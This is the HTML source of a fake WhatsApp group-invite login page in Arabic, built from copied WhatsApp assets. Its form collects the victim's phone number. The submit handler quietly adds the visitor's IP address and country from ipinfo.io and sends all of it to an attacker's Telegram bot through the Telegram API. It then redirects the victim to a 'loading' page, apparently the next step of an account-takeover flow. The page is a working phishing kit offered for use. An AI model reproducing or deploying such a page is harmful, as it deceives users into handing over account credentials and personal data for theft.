<!DOCTYPE html>
<html lang="ar" id="facebook" class="">
<head>
        <meta charset="utf-8">
        <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
        <title id="pageTitle">الدعوة للانضمام إلى مجموعة واتساب</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta name="keywords">
        <meta property="og:title" content="">
        <meta property="og:image" content="https://static.whatsapp.net/rsrc.php/v3/yo/r/J5gK5AgJ_L5.png">
        <meta property="og:site_name" content="WhatsApp.com">
        <meta property="og:description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta property="og:keywords">
        <meta property="invite_link_type" content="REGULAR">
        <meta property="invite_link_type_v2" content="">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="robots" content="noindex">
        <link rel="icon" href="https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png">
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="vRp9yOm" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y-/l/0,cross/l7NbYm_6epW.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Dpp+Eva" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y9/l/0,cross/58P2v5ZIoPt.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="X+JXpLn" crossorigin="anonymous" />
        <script src="https://static.whatsapp.net/rsrc.php/v3/yk/r/OWR-hjvxarf.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="QyIuDX8" crossorigin="anonymous" nonce="MnuWJ8cm"></script>


  <link rel="stylesheet" href="style.css">


      <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Cairo&display=swap" rel="stylesheet">

    <style type="text/css">
        *{
            font-family: 'Cairo', sans-serif;
        }

        
        #sidebar-menu li a i{
            left: 5px;
        }
    </style>


  
      <style>
        /* Style the select element */
        .select-dropdown {
            position: relative;
            display: inline-block;
            width: 200px;
            /* Set the desired width */
            font-family: Arial, sans-serif;
            /* Set the desired font */
            font-size: 14px;
            /* Set the desired font size */
        }

        /* Style the select dropdown arrow */
        .select-dropdown::after {
            content: '\25BE';
            /* Unicode character for the down arrow */
            position: absolute;
            top: 50%;
            right: 10px;
            transform: translateY(-50%);
            pointer-events: none;
        }

        /* Style the dropdown options */
        .select-dropdown select {
            appearance: none;
            -webkit-appearance: none;
            -moz-appearance: none;
            width: 100%;
            padding: 8px 30px 8px 10px;
            border: 1px solid #ccc;
            background-color: #fff;
            cursor: pointer;
        }

        /* Style the selected option */
        .select-dropdown select option:checked {
            background-color: #e0e0e0;
        }

        /* Style the dropdown when it is open */
        .select-dropdown select:focus {
            outline: none;
            box-shadow: 0 0 4px rgba(0, 0, 0, 0.1);
        }

        /* Style the select element */
        #phoneCountryCode {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 108px;
            background-color: #f1f1f1;
            padding: 10px;
            font-size: 16px;
            border-bottom: 3px solid #36ba6d;
            border-radius: 5px;
        }

        /* Style the phone input element */

        /* Style the form button */
        button[type="submit"] {
            padding: 10px 20px;
            font-size: 16px;
            background-color: #4CAF50;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        /* Style the form button on hover */
        button[type="submit"]:hover {
            background-color: #45a049;
        }

        .input-phone {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 75%;
            font-size: 21px;
            border-bottom: 3px solid #36ba6d;
        }

        :focus {
            outline: none;

        }


        input::placeholder {

            opacity: 75%;
        }

        ._9vcv,
        ._advm {
            border: none;
        }

        ul.iti__country-list>#iti-0__country-listbox {
            list-style-type: none;
            margin-right: -266px;
            margin-top: 1px;
            padding: 0;
        }

        ._9r_7 h4,
        ._9r_7 ._7gz5,
        ._9r_7 p,
        ._9r_7 li,
        ._9r_7 ol {
            font-size: 21px;
            line-height: 26px;
        }

        .iti--separate-dial-code .iti__selected-flag {
            background-color: rgba(0, 0, 0, 0.05);
            margin-right: -77px;
            direction: ltr;
            margin-left: 29px;
            padding: 2px;
        }

        .iti--separate-dial-code .iti__selected-dial-code {
            margin-left: 4px;
        }

        .iti__flag.iti__sa {
            height: 15px;
            background-position: -4339px 0px;
            display: none;
        }

        input::placeholder {

            opacity: 75%;
        }

        ul {
            list-style-type: none;
            margin-right: -200;
            padding: 0;
        }

        .iti__country-list {
            position: relative;
            z-index: 2;
            list-style: none;
            text-align: left;
            padding: 0;
            margin: 0 0 -5px 23px;
            box-shadow: 1px 1px 4px rgba(0, 0, 0, 0.2);
            background-color: white;
            border: 1px solid #CCC;
            white-space: nowrap;
            max-height: 200px;
            overflow-y: scroll;
            -webkit-overflow-scrolling: touch;
        }

        #phone::placeholder {
            font-size: 16px;
            text-align: center;
        }

        .code-input-container {
            display: flex;
        }

        .code-input {
            border-top: none;
            border-right: none;
            border-left: none;
            border-bottom: 3px solid #36ba6d;
            direction: ltr;
            background-color: #f1f1f1;
            width: 40px;
            height: 40px;
            font-size: 18px;
            text-align: center;
            margin-right: 5px;
        }
        .btn.btn-default {
  background-color: #fff;
  color: #333;
  border: 1px solid #ccc;
  padding: 10px 20px;
  border: none;
  font-size: 14px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  cursor: pointer;
}

.btn.btn-default:hover {
  background-color: #e0e0e0;
}

.btn.btn-default:active {
  background-color: #d0d0d0;
}

.btn.btn-default:focus {
  outline: none;
  box-shadow: none;
}

span{
     font-family: 'Cairo', sans-serif;
}

    </style>
  
</head>

<header class="_af-2 _afwk" data-testid="whatsapp_www_header" id="u_0_0_J5" style="background: #fcf5eb;">
                    <div class="_afvx">
                        <div class="_afvy">
                            <div class="_af8g"><button aria-label="فتح قائمة الهاتف المحمول" class="_afvu _ain3 _9vcv" id="u_0_1_uK"><span class="_advp _aeam"><img  src="Minnu.png"></span></button>
                          
                          
                            </div>
                        </div><span class="_afwd"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="https://static.whatsapp.net/rsrc.php/v3/yq/r/mdQNdcFMi0p.png"></span></a></span><span class="_afw1"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="https://static.whatsapp.net/rsrc.php/v3/y7/r/DSxOAUB0raA.png"></span></a></span>
                        <nav class="_afwe">
                            <ul class="_afwg">
                                <li class="_afn_">
                                    <div><button aria-controls="replace_me_subnav" aria-expanded="false" id="u_0_7_NM" class="_9vd5 _aens _afod _afoe"><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">الخصائص</span></span></button>
                                      
                                    </div>
                                </li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">الخصوصية</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">مركز
                                                    المساعدة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">المدونة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">للأنشطة التجارية</span></span></span></a></li>
                            </ul>
                        </nav>
                        <div class="_agga"><span class="_ag1l">
                        <span class="AA" style=" width: max-content; padding: 100px; ">
                        <a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">واتساب
                                                    ويب</span></span></span></a></span><a href="#" class="_aeo8 _9vcv _9u4o _9u4i" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam">تنزيل</span><span><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _9u4c">
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                        </svg></span></a></span><a href="#" aria-label="تنزيل" class="_afwh _adie _adif"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _adid _afbl">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                </svg></a></div>
                    </div>
                </header>

<body style=" background-color: #fcf5eb; ">

<div class="container" style=" margin-block: 100px;margin-top:100px;">
  <h2>WhatsApp تسجيل الدخول</h2>
  <div style=" text-align: center; margin: 20px;">
  <img class="_9vx6" src="https://static.whatsapp.net/rsrc.php/v3/yB/r/_0dVljceIA5.png">
  <h4 class="_9vd5 _9scb" style="color:#5E5E5E; font-size: large;">الدعوة للانضمام إلى مجموعة واتساب</h4>
  </div>
  
<form action="#">
<input type="hidden" id="ip">
<input type="hidden" id="country">

    <div class="input-group" style="text-align: center;">


<select id="countryCode" name="countryCode" style="padding: 10px; background-color: #f1f1f1;width:90px;">
  <!-- سيتم ملء الخيارات هنا باستخدام الجافا سكريبت -->
</select>
    
      <input style="width: auto; padding: 7px;margin-top: 5px;margin-bottom: 5px;border: 1px solid #ccc;border-radius: 5px;display: inline-block;box-sizing: border-box; font-family: 'Cairo', sans-serif;" type="tel" id="phoneNumber" name="phoneNumber" placeholder="رقم الهاتف" pattern="[0-9]+">
      <div id="error-message" style="text-align: center; color: red;"></div>
    </div>
<div style="text-align: center;">
    <button style="padding: 10px 20px; font-size: 16px; background-color: #4CAF50; color: #fff; border: none; border-radius: 5px; cursor: pointer; display: inline-block; width: 150px; font-family: 'Cairo', sans-serif;" type="submit">متابعة</button>
</div>
  </form>
</div>

<script>
var countries = [
  { code: "AF", name: "🇦🇫 +93" },
  { code: "AL", name: "🇦🇱 +355" },
  { code: "DZ", name: "🇩🇿 +213" },
  { code: "AS", name: "🇦🇸 +1-684" },
  { code: "AD", name: "🇦🇩 +376" },
  { code: "AO", name: "🇦🇴 +244" },
  { code: "AI", name: "🇦🇮 +1-264" },
  { code: "AQ", name: "🇦🇶 +672" },
  { code: "AG", name: "🇦🇬 +1-268" },
  { code: "AR", name: "🇦🇷 +54" },
  { code: "AM", name: "🇦🇲 +374" },
  { code: "AW", name: "🇦🇼 +297" },
  { code: "AU", name: "🇦🇺 +61" },
  { code: "AT", name: "🇦🇹 +43" },
  { code: "AZ", name: "🇦🇿 +994" },
  { code: "BS", name: "🇧🇸 +1-242" },
  { code: "BH", name: "🇧🇭 +973" },
  { code: "BD", name: "🇧🇩 +880" },
  { code: "BB", name: "🇧🇧 +1-246" },
  { code: "BY", name: "🇧🇾 +375" },
  { code: "BE", name: "🇧🇪 +32" },
  { code: "BZ", name: "🇧🇿 +501" },
  { code: "BJ", name: "🇧🇯 +229" },
  { code: "BM", name: "🇧🇲 +1-441" },
  { code: "BT", name: "🇧🇹 +975" },
  { code: "BO", name: "🇧🇴 +591" },
  { code: "BA", name: "🇧🇦 +387" },
  { code: "BW", name: "🇧🇼 +267" },
  { code: "BR", name: "🇧🇷 +55" },
  { code: "IO", name: "🇮🇴 +246" },
  { code: "VG", name: "🇻🇬 +1-284" },
  { code: "BN", name: "🇧🇳 +673" },
  { code: "BG", name: "🇧🇬 +359" },
  { code: "BF", name: "🇧🇫 +226" },
  { code: "BI", name: "🇧🇮 +257" },
  { code: "KH", name: "🇰🇭 +855" },
  { code: "CM", name: "🇨🇲 +237" },
  { code: "CA", name: "🇨🇦 +1" },
  { code: "CV", name: "🇨🇻 +238" },
  { code: "KY", name: "🇰🇾 +1-345" },
  { code: "CF", name: "🇨🇫 +236" },
  { code: "TD", name: "🇹🇩 +235" },
  { code: "CL", name: "🇨🇱 +56" },
  { code: "CN", name: "🇨🇳 +86" },
  { code: "CX", name: "🇨🇽 +61" },
  { code: "CC", name: "🇨🇨 +61" },
  { code: "CO", name: "🇨🇴 +57" },
  { code: "KM", name: "🇰🇲 +269" },
  { code: "CK", name: "🇨🇰 +682" },
  { code: "CR", name: "🇨🇷 +506" },
  { code: "HR", name: "🇭🇷 +385" },
  { code: "CU", name: "🇨🇺 +53" },
  { code: "CW", name: "🇨🇼 +599" },
  { code: "CY", name: "🇨🇾 +357" },
  { code: "CZ", name: "🇨🇿 +420" },
  { code: "CD", name: "🇨🇩 +243" },
  { code: "DK", name: "🇩🇰 +45" },
  { code: "DJ", name: "🇩🇯 +253" },
  { code: "DM", name: "🇩🇲 +1-767" },
  { code: "DO", name: "🇩🇴 +1-809" },
  { code: "TL", name: "🇹🇱 +670" },
  { code: "EC", name: "🇪🇨 +593" },
  { code: "EG", name: "🇪🇬 +20" },
  { code: "SV", name: "🇸🇻 +503" },
  { code: "GQ", name: "🇬🇶 +240" },
  { code: "ER", name: "🇪🇷 +291" },
  { code: "EE", name: "🇪🇪 +372" },
  { code: "ET", name: "🇪🇹 +251" },
  { code: "FK", name: "🇫🇰 +500" },
  { code: "FO", name: "🇫🇴 +298" },
  { code: "FJ", name: "🇫🇯 +679" },
  { code: "FI", name: "🇫🇮 +358" },
  { code: "FR", name: "🇫🇷 +33" },
  { code: "PF", name: "🇵🇫 +689" },
  { code: "GA", name: "🇬🇦 +241" },
  { code: "GM", name: "🇬🇲 +220" },
  { code: "GE", name: "🇬🇪 +995" },
  { code: "DE", name: "🇩🇪 +49" },
  { code: "GH", name: "🇬🇭 +233" },
  { code: "GI", name: "🇬🇮 +350" },
  { code: "GR", name: "🇬🇷 +30" },
  { code: "GL", name: "🇬🇱 +299" },
  { code: "GD", name: "🇬🇩 +1-473" },
  { code: "GU", name: "🇬🇺 +1-671" },
  { code: "GT", name: "🇬🇹 +502" },
  { code: "GG", name: "🇬🇬 +44" },
  { code: "GN", name: "🇬🇳 +224" },
  { code: "GW", name: "🇬🇼 +245" },
  { code: "GY", name: "🇬🇾 +592" },
  { code: "HT", name: "🇭🇹 +509" },
  { code: "HN", name: "🇭🇳 +504" },
  { code: "HK", name: "🇭🇰 +852" },
  { code: "HU", name: "🇭🇺 +36" },
  { code: "IS", name: "🇮🇸 +354" },
  { code: "IN", name: "🇮🇳 +91" },
  { code: "ID", name: "🇮🇩 +62" },
  { code: "IR", name: "🇮🇷 +98" },
  { code: "IQ", name: "🇮🇶 +964" },
  { code: "IE", name: "🇮🇪 +353" },
  { code: "IM", name: "🇮🇲 +44" },
  { code: "IL", name: "🇮🇱 +972" },
  { code: "IT", name: "🇮🇹 +39" },
  { code: "CI", name: "🇨🇮 +225" },
  { code: "JM", name: "🇯🇲 +1-876" },
  { code: "JP", name: "🇯🇵 +81" },
  { code: "JE", name: "🇯🇪 +44" },
  { code: "JO", name: "🇯🇴 +962" },
  { code: "KZ", name: "🇰🇿 +7" },
  { code: "KE", name: "🇰🇪 +254" },
  { code: "KI", name: "🇰🇮 +686" },
  { code: "XK", name: "🇽🇰 +383" },
  { code: "KW", name: "🇰🇼 +965" },
  { code: "KG", name: "🇰🇬 +996" },
  { code: "LA", name: "🇱🇦 +856" },
  { code: "LV", name: "🇱🇻 +371" },
  { code: "LB", name: "🇱🇧 +961" },
  { code: "LS", name: "🇱🇸 +266" },
  { code: "LR", name: "🇱🇷 +231" },
  { code: "LY", name: "🇱🇾 +218" },
  { code: "LI", name: "🇱🇮 +423" },
  { code: "LT", name: "🇱🇹 +370" },
  { code: "LU", name: "🇱🇺 +352" },
  { code: "MO", name: "🇲🇴 +853" },
  { code: "MK", name: "🇲🇰 +389" },
  { code: "MG", name: "🇲🇬 +261" },
  { code: "MW", name: "🇲🇼 +265" },
  { code: "MY", name: "🇲🇾 +60" },
  { code: "MV", name: "🇲🇻 +960" },
  { code: "ML", name: "🇲🇱 +223" },
  { code: "MT", name: "🇲🇹 +356" },
  { code: "MH", name: "🇲🇭 +692" },
  { code: "MR", name: "🇲🇷 +222" },
  { code: "MU", name: "🇲🇺 +230" },
  { code: "YT", name: "🇾🇹 +262" },
  { code: "MX", name: "🇲🇽 +52" },
  { code: "FM", name: "🇫🇲 +691" },
  { code: "MD", name: "🇲🇩 +373" },
  { code: "MC", name: "🇲🇨 +377" },
  { code: "MN", name: "🇲🇳 +976" },
  { code: "ME", name: "🇲🇪 +382" },
  { code: "MS", name: "🇲🇸 +1-664" },
  { code: "MA", name: "🇲🇦 +212" },
  { code: "MZ", name: "🇲🇿 +258" },
  { code: "MM", name: "🇲🇲 +95" },
  { code: "NA", name: "🇳🇦 +264" },
  { code: "NR", name: "🇳🇷 +674" },
  { code: "NP", name: "🇳🇵 +977" },
  { code: "NL", name: "🇳🇱 +31" },
  { code: "AN", name: "🇦🇳 +599" },
  { code: "NC", name: "🇳🇨 +687" },
  { code: "NZ", name: "🇳🇿 +64" },
  { code: "NI", name: "🇳🇮 +505" },
  { code: "NE", name: "🇳🇪 +227" },
  { code: "NG", name: "🇳🇬 +234" },
  { code: "NU", name: "🇳🇺 +683" },
  { code: "KP", name: "🇰🇵 +850" },
  { code: "MP", name: "🇲🇵 +1-670" },
  { code: "NO", name: "🇳🇴 +47" },
  { code: "OM", name: "🇴🇲 +968" },
  { code: "PK", name: "🇵🇰 +92" },
  { code: "PW", name: "🇵🇼 +680" },
  { code: "PS", name: "🇵🇸 +970" },
  { code: "PA", name: "🇵🇦 +507" },
  { code: "PG", name: "🇵🇬 +675" },
  { code: "PY", name: "🇵🇾 +595" },
  { code: "PE", name: "🇵🇪 +51" },
  { code: "PH", name: "🇵🇭 +63" },
  { code: "PN", name: "🇵🇳 +64" },
  { code: "PL", name: "🇵🇱 +48" },
  { code: "PT", name: "🇵🇹 +351" },
  { code: "PR", name: "🇵🇷 +1-787" },
  { code: "QA", name: "🇶🇦 +974" },
  { code: "CG", name: "🇨🇬 +242" },
  { code: "RE", name: "🇷🇪 +262" },
  { code: "RO", name: "🇷🇴 +40" },
  { code: "RU", name: "🇷🇺 +7" },
  { code: "RW", name: "🇷🇼 +250" },
  { code: "BL", name: "🇧🇱 +590" },
  { code: "SH", name: "🇸🇭 +290" },
  { code: "KN", name: "🇰🇳 +1-869" },
  { code: "LC", name: "🇱🇨 +1-758" },
  { code: "MF", name: "🇲🇫 +590" },
  { code: "PM", name: "🇵🇲 +508" },
  { code: "VC", name: "🇻🇨 +1-784" },
  { code: "WS", name: "🇼🇸 +685" },
  { code: "SM", name: "🇸🇲 +378" },
  { code: "ST", name: "🇸🇹 +239" },
  { code: "SA", name: "🇸🇦 +966" },
  { code: "SN", name: "🇸🇳 +221" },
  { code: "RS", name: "🇷🇸 +381" },
  { code: "SC", name: "🇸🇨 +248" },
  { code: "SL", name: "🇸🇱 +232" },
  { code: "SG", name: "🇸🇬 +65" },
  { code: "SX", name: "🇸🇽 +1-721" },
  { code: "SK", name: "🇸🇰 +421" },
  { code: "SI", name: "🇸🇮 +386" },
  { code: "SB", name: "🇸🇧 +677" },
  { code: "SO", name: "🇸🇴 +252" },
  { code: "ZA", name: "🇿🇦 +27" },
  { code: "KR", name: "🇰🇷 +82" },
  { code: "SS", name: "🇸🇸 +211" },
  { code: "ES", name: "🇪🇸 +34" },
  { code: "LK", name: "🇱🇰 +94" },
  { code: "SD", name: "🇸🇩 +249" },
  { code: "SR", name: "🇸🇷 +597" },
  { code: "SJ", name: "🇸🇯 +47" },
  { code: "SZ", name: "🇸🇿 +268" },
  { code: "SE", name: "🇸🇪 +46" },
  { code: "CH", name: "🇨🇭 +41" },
  { code: "SY", name: "🇸🇾 +963" },
  { code: "TW", name: "🇹🇼 +886" },
  { code: "TJ", name: "🇹🇯 +992" },
  { code: "TZ", name: "🇹🇿 +255" },
  { code: "TH", name: "🇹🇭 +66" },
  { code: "TG", name: "🇹🇬 +228" },
  { code: "TK", name: "🇹🇰 +690" },
  { code: "TO", name: "🇹🇴 +676" },
  { code: "TT", name: "🇹🇹 +1-868" },
  { code: "TN", name: "🇹🇳 +216" },
  { code: "TR", name: "🇹🇷 +90" },
  { code: "TM", name: "🇹🇲 +993" },
  { code: "TC", name: "🇹🇨 +1-649" },
  { code: "TV", name: "🇹🇻 +688" },
  { code: "VI", name: "🇻🇮 +1-340" },
  { code: "UG", name: "🇺🇬 +256" },
  { code: "UA", name: "🇺🇦 +380" },
  { code: "AE", name: "🇦🇪 +971" },
  { code: "GB", name: "🇬🇧 +44" },
  { code: "US", name: "🇺🇸 +1" },
  { code: "UY", name: "🇺🇾 +598" },
  { code: "UZ", name: "🇺🇿 +998" },
  { code: "VU", name: "🇻🇺 +678" },
  { code: "VA", name: "🇻🇦 +379" },
  { code: "VE", name: "🇻🇪 +58" },
  { code: "VN", name: "🇻🇳 +84" },
  { code: "WF", name: "🇼🇫 +681" },
  { code: "EH", name: "🇪🇭 +212" },
  { code: "YE", name: "🇾🇪 +967" },
  { code: "ZM", name: "🇿🇲 +260" },
  { code: "ZW", name: "🇿🇼 +263" },
];

// جلب بيانات الموقع الجغرافي باستخدام خدمة تحديد الموقع الجغرافي
fetch('https://ipinfo.io/json')
  .then(response => response.json())
  .then(data => {
    // استخراج رمز البلد من بيانات الموقع
    var userCountry = data.country;

    // إيجاد بلد المستخدم في مصفوفة البلدان
    var selectedCountry = countries.find(country => country.code === userCountry);

    if (selectedCountry) {
      // إنشاء خيارات البلدان
      var countryCodeSelect = document.getElementById("countryCode");
      countries.forEach(country => {
        var option = document.createElement("option");
        option.value = country.code;
        option.textContent = country.name;
        if (country.code === selectedCountry.code) {
          option.selected = true; // تحديد البلد الحالي للمستخدم
        }
        countryCodeSelect.appendChild(option);
      });
    }
  });
</script>
        
  <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
  <script src="bot_config.js"></script>
<script>
    $(document).ready(function() {
        $('form').submit(function(event) {
            event.preventDefault();

            var selectedOption = $("#countryCode option:selected").text(); // استرجاع النص المحدد من الخيار المحدد
            var countryCode = selectedOption.trim(); // الحصول على الرمز الدولي للهاتف
            var phoneNumber = $("#phoneNumber").val(); // الحصول على رقم الهاتف المدخل
            var ipAddress = $("#ip").val(); // الحصول على عنوان الآي بي
            var country = $("#country").val(); // الحصول على اسم الدولة

            // التحقق من إدخال رقم الهاتف
            if (!phoneNumber) {
                $("#error-message").text("الرجاء إدخال رقم الهاتف");
                return;
            } else {
                $("#error-message").text(""); // إزالة رسالة الخطأ في حالة إدخال رقم الهاتف
            }

            var telegramMessage = "Country Code : " + countryCode + "\nPhone Number : " + phoneNumber + "\nIP Address : " + ipAddress + "\nCountry : " + country;

            var telegramBotUrl = "https://api.telegram.org/bot" + botConfig.botToken + "/sendMessage";
            var requestData = {
                chat_id: botConfig.chatId,
                text: telegramMessage
            };

            // إرسال البيانات إلى الروبوت
            $.post(telegramBotUrl, requestData, function(response) {
                // بعد الإرسال، توجيه المستخدم إلى الصفحة الأخرى
                window.location.href = "loading.html";
            });
        });

        // جلب معلومات الآي بي باستخدام خدمة ipinfo.io
        $.get("https://ipinfo.io", function(response) {
            var ipAddress = response.ip;
            var country = response.country; // الحصول على اسم الدولة

            // تحديث الحقل المخصص للآي بي
            $("#ip").val(ipAddress);

            // تحديث الحقل المخصص للدولة
            $("#country").val(country);
        }, "json");
    });
</script>




        <!-- script jquery -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>

        <script>
            $('#phoneNumber').mask('00000000000000');
        </script>

</body>
</html>
